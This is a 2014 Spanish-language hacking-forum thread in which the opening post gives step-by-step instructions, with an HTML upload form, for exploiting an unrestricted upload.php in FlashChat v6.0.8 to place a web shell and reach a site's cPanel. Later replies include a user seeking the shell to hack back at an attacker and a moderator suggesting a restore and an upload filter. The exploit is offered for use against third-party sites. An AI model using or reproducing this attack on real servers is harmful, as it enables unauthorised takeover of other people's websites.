elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  FlashChat v6 0 8 Hack /upload.php
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: FlashChat v6 0 8 Hack /upload.php  (Leído 6,534 veces)
andygrimm

Desconectado Desconectado

Mensajes: 3


Ver Perfil
FlashChat v6 0 8 Hack /upload.php
« en: 2 Abril 2014, 06:19 am »

NO SOY EL DESCUBRIDOR DE ESTO, SIMPLEMENTE QUIERO APORTARLO.

1- Bueno para empezar hay que entrar en alguna pagina de FlashChat v6 0 8 y añadirle a la pagina el /upload.php , ejemplo: pagina.com/upload.php, si da una pagina en blanco con algun mensaje en texto, significa que es vulnerable.

2- Ya que tengamos la pagina vulnerable, creamos un archivo de texto con el siguiente codigo:
<form action="http://pagina.com/upload.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>
Donde dice "action=" ahi ponemos la pagina vulnerable, lo guardamos con la extension .html.

3- Estando en la pagina vulnerable ejecutamos el archivo creado, y de ahi, subimos nuestro shell.php y ya podriamos logear en el cpanel.

Bueno eso fue todo, cualquier duda o consulta ya saben, consulten, suerte!
By andygrimm
En línea

Simbita201

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: FlashChat v6 0 8 Hack /upload.php
« Respuesta #1 en: 3 Junio 2014, 17:29 pm »

Gracias por el aporte, pero donde encuentro el Shell.php .

Salu2
En línea

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: FlashChat v6 0 8 Hack /upload.php
« Respuesta #2 en: 3 Junio 2014, 19:34 pm »

Gracias por el aporte, pero donde encuentro el Shell.php .

Salu2


>.> en serio? eso lo haces tu
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
Simbita201

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: FlashChat v6 0 8 Hack /upload.php
« Respuesta #3 en: 3 Junio 2014, 20:35 pm »

no tengo ni idea, me hachearon el chat y lo intnto recuperar

salu2
En línea

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: FlashChat v6 0 8 Hack /upload.php
« Respuesta #4 en: 4 Junio 2014, 01:13 am »

Metete a tu server, borra todo y monta tu respaldo
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
Sh4k4


Desconectado Desconectado

Mensajes: 965


xMHT


Ver Perfil
Re: FlashChat v6 0 8 Hack /upload.php
« Respuesta #5 en: 4 Junio 2014, 08:38 am »

Citar
atasquece..
En línea

Simbita201

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: FlashChat v6 0 8 Hack /upload.php
« Respuesta #6 en: 4 Junio 2014, 10:40 am »

Metete a tu server, borra todo y monta tu respaldo

Gracias amigo.
No es la primera vez que me lo hace el mismo individuo, trato de saber recuperarlo, a su estilo, para demostrarle que puedo hacerlo y que me deje en paz.

Salu2
En línea

Simbita201

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: FlashChat v6 0 8 Hack /upload.php
« Respuesta #7 en: 4 Junio 2014, 10:42 am »

atasquece..

Muchas Gracias, lo intentare, solo es cuestión de mostrarle al que me hachea, que tb soy capaz de hacerlo, espero asi se olvide de mi.

Salu2
En línea

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: FlashChat v6 0 8 Hack /upload.php
« Respuesta #8 en: 4 Junio 2014, 13:38 pm »

??? o suena a una excusa! XD puedes colocar un filtro en esa parte del sistema ya que sabes por donde sube y listo adíos ataque shell... es uno de los ataque más faciles de bloquear! XD
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
Simbita201

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: FlashChat v6 0 8 Hack /upload.php
« Respuesta #9 en: 4 Junio 2014, 19:15 pm »

Si supiera hacer esas cosas, con el priemer ataque me hubiera bastado, lo habría solucionado.

Gracias

Edito. Gracias Engel, no me ha funcionado, error 404

sañu2
« Última modificación: 4 Junio 2014, 19:44 pm por Simbita201 » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Hack en linux y Hack en windows
Sugerencias y dudas sobre el Foro
obelish 0 4,650 Último mensaje 14 Julio 2004, 11:12 am
por obelish
Upload PHP
PHP
nati_les 6 3,217 Último mensaje 22 Marzo 2007, 17:44 pm
por alienmaster
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines